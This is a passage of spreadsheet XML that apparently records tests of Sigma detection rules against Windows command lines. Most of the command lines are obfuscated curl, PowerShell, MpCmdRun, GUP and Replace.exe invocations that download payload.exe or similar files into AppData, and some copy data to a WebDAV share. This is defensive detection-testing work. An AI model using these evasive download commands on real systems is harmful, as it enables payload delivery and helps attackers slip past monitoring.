      <c r="E70" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="44" t="n"/>
      <c r="J70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="43" t="n"/>
      <c r="B71" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C71" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D71" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E71" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="44" t="n"/>
      <c r="J71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="43" t="n"/>
      <c r="B72" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C72" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D72" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E72" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="44" t="n"/>
      <c r="J72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="43" t="n"/>
      <c r="B73" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C73" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D73" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E73" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="43" t="n"/>
      <c r="J73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="43" t="n"/>
      <c r="B74" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C74" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D74" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E74" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="44" t="n"/>
      <c r="J74" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="43" t="n"/>
      <c r="B75" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C75" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D75" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E75" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="43" t="n"/>
      <c r="J75" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="43" t="n"/>
      <c r="B76" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C76" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D76" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E76" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="44" t="n"/>
      <c r="J76" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="43" t="n"/>
      <c r="B77" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C77" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D77" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E77" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="43" t="n"/>
      <c r="J77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="43" t="n"/>
      <c r="B78" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C78" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D78" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E78" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="43" t="n"/>
      <c r="J78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="43" t="n"/>
      <c r="B79" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C79" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D79" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E79" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="44" t="n"/>
      <c r="J79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="43" t="n"/>
      <c r="B80" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C80" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D80" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E80" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="43" t="n"/>
      <c r="J80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="43" t="n"/>
      <c r="B81" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C81" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D81" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E81" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="43" t="n"/>
      <c r="J81" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="43" t="n"/>
      <c r="B82" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C82" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D82" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E82" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="43" t="n"/>
      <c r="J82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="43" t="n"/>
      <c r="B83" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C83" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D83" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E83" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="43" t="n"/>
      <c r="J83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="43" t="n"/>
      <c r="B84" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C84" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D84" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E84" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:ON /C "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="43" t="n"/>
      <c r="J84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="43" t="n"/>
      <c r="B85" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C85" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D85" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E85" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \"$env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="43" t="n"/>
      <c r="J85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="43" t="n"/>
      <c r="B86" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C86" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D86" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E86" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="43" t="n"/>
      <c r="J86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="43" t="n"/>
      <c r="B87" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C87" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D87" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E87" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="43" t="n"/>
      <c r="J87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="43" t="n"/>
      <c r="B88" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C88" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D88" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E88" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="43" t="n"/>
      <c r="J88" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="43" t="n"/>
      <c r="B89" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C89" s="44" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D89" s="44" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E89" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c t^yp^e C:\temp\data.txt &gt; \\webdav.server.local\share\data.txt</t>
        </is>
      </c>
      <c r="F89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="43" t="n"/>
      <c r="J89" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K89" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="43" t="n"/>
      <c r="B90" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_type_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C90" s="44" t="inlineStr">
        <is>
          <t>Potential Download/Upload Activity Using Type Command</t>
        </is>
      </c>
      <c r="D90" s="44" t="inlineStr">
        <is>
          <t>aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f</t>
        </is>
      </c>
      <c r="E90" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c type C:\temp\data.txt &gt;\\webdav.server.local\share\data.txt</t>
        </is>
      </c>
      <c r="F90" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G90" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="43" t="n"/>
      <c r="J90" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K90" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B91" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C91" s="44" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D91" s="44" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E91" s="44" t="inlineStr">
        <is>
          <t>GUP.exe  -unzipTo  "" "C:\Temp" "Sample [https://getsamplefiles.com/download/zip/sample-2.zip](https://getsamplefiles.com/download/zip/sample-2.zip) CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"</t>
        </is>
      </c>
      <c r="F91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="43" t="n"/>
      <c r="J91" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K91" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B92" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_gup_download</t>
        </is>
      </c>
      <c r="C92" s="44" t="inlineStr">
        <is>
          <t>File Download Using Notepad++ GUP Utility</t>
        </is>
      </c>
      <c r="D92" s="44" t="inlineStr">
        <is>
          <t>44143844-0631-49ab-97a0-96387d6b2d7c</t>
        </is>
      </c>
      <c r="E92" s="43" t="inlineStr">
        <is>
          <t>GUP.exe "-unzipTo" "" "C:\Temp" "Sample [https://getsamplefiles.com/download/zip/sample-2.zip](https://getsamplefiles.com/download/zip/sample-2.zip) CAC4D26F32CA629DFB10FE614ED00EB1066A0C0011386290D3426C3DE2E53AC6"</t>
        </is>
      </c>
      <c r="F92" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G92" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I92" s="43" t="n"/>
      <c r="J92" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K92" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B93" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C93" s="44" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D93" s="44" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E93" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32
eplace.exe "C:\AtomicRedTeam\atomics\T1105\src
edcanary.cab" C:\Users	haim\AppData\Local\Temp "/A"</t>
        </is>
      </c>
      <c r="F93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K93" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B94" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C94" s="44" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D94" s="44" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E94" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32
eplace.exe "C:\AtomicRedTeam\atomics\T1105\src
edcanary.cab" C:\Users	haim\AppData\Local\Temp /^A"</t>
        </is>
      </c>
      <c r="F94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="43" t="n"/>
      <c r="J94" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K94" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B95" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C95" s="44" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D95" s="44" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E95" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32
eplace.exe "C:\AtomicRedTeam\atomics\T1105\src
edcanary.cab" C:\Users	haim\AppData\Local\Temp  /A</t>
        </is>
      </c>
      <c r="F95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K95" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B96" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C96" s="44" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D96" s="44" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E96" s="44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F96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="43" t="n"/>
      <c r="J96" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K96" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B97" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C97" s="44" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D97" s="44" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E97" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "MpCmdRun.exe -Down^loadFile -url [https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt) -path C:\Users	haim\AppData\Local\Temp\Atomic-license.txt"</t>
        </is>
      </c>
      <c r="F97" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G97" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K97" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="43" t="n"/>
      <c r="B98" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C98" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D98" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E98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98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="44" t="n"/>
      <c r="J98" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="44" t="b">
        <v>0</v>
      </c>
